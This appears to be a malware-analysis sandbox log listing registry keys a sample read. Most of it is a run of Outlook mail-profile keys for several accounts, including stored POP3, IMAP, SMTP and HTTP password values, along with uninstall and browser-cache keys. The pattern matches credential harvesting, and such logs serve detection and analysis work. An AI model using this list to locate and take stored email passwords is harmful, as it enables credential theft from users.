HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\DisplayName HKEY_CURRENT_USER\Software\WinRAR\HWID HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\filename.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_CURRENT_USER\Software\Microsoft\Windows Mail\Salt HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Account Manager\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows 